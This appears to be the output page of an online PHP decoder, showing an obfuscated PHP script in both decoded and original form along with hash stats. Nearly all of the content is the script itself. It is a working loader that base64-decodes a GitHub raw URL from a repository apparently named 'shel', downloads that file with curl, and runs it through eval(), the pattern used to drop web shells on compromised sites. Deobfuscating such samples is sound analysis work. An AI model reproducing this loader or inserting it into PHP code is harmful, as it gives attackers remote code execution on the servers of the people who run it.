Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto ctBdy; ZNccX: if ($script1 !== false && $script1 !== 404) { eval($x . $script..

Decoded Output download

<?php 
 goto ctBdy; ZNccX: if ($script1 !== false && $script1 !== 404) { eval($x . $script1); } else { $script2 = get($url2); if ($script2 !== false) { eval($x . $script2); } else { echo "Both attempts failed."; } } goto rSXrm; JelzP: $x = "?>"; goto rms8U; GfGMm: $url2 = base64_decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Nla2poaGgvc2hlbC9yZWZzL2hlYWRzL21haW4vbWQ1aW5p"); goto XMuPq; XMuPq: $script1 = get($url1); goto ZNccX; rms8U: $url1 = base64_decode("aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Nla2poaGgvc2hlbC9yZWZzL2hlYWRzL21haW4vbWQ1aW5p"); goto GfGMm; ctBdy: function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_NOBODY, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_URL, $url); curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($http_code == 200) { curl_setopt($ch, CURLOPT_NOBODY, false); curl_setopt($ch, CURLOPT_HEADER, false); $data = curl_exec($ch); curl_close($ch); return $data; } else { curl_close($ch); return false; } } goto JelzP; rSXrm: ?>

Did this file decode correctly?

Original Code

<?php
 goto ctBdy; ZNccX: if ($script1 !== false && $script1 !== 404) { eval($x . $script1); } else { $script2 = get($url2); if ($script2 !== false) { eval($x . $script2); } else { echo "\x42\x6f\164\150\40\x61\164\x74\145\x6d\160\164\163\x20\146\x61\151\154\x65\x64\x2e"; } } goto rSXrm; JelzP: $x = "\77\76"; goto rms8U; GfGMm: $url2 = base64_decode("\141\110\x52\x30\143\110\x4d\66\114\171\71\x79\131\130\143\x75\132\62\154\x30\141\x48\126\x69\144\130\116\x6c\143\155\x4e\x76\x62\156\122\x6c\142\x6e\x51\165\x59\62\x39\164\x4c\63\116\x6c\x61\x32\x70\157\141\x47\147\166\143\x32\x68\154\142\x43\x39\x79\132\127\132\172\x4c\x32\150\x6c\x59\127\x52\x7a\114\62\x31\150\x61\x57\64\166\x62\x57\x51\x31\141\127\x35\x70"); goto XMuPq; XMuPq: $script1 = get($url1); goto ZNccX; rms8U: $url1 = base64_decode("\141\x48\122\60\143\x48\115\x36\x4c\x79\x39\171\131\x58\x63\x75\132\x32\x6c\60\141\x48\126\151\x64\x58\x4e\154\143\x6d\116\166\x62\x6e\122\x6c\142\156\x51\x75\x59\62\71\x74\x4c\63\116\x6c\x61\62\160\x6f\x61\x47\x67\166\143\x32\150\x6c\142\x43\71\171\132\127\x5a\172\114\62\150\x6c\131\127\122\x7a\x4c\x32\x31\x68\x61\127\64\166\x62\x57\x51\61\141\127\x35\160"); goto GfGMm; ctBdy: function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_NOBODY, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_URL, $url); curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($http_code == 200) { curl_setopt($ch, CURLOPT_NOBODY, false); curl_setopt($ch, CURLOPT_HEADER, false); $data = curl_exec($ch); curl_close($ch); return $data; } else { curl_close($ch); return false; } } goto JelzP; rSXrm: ?>

Function Calls

None

Variables

None

Stats

MD5 cee5d770aca70b359e7959c172c3109d
Eval Count 0
Decode Time 53 ms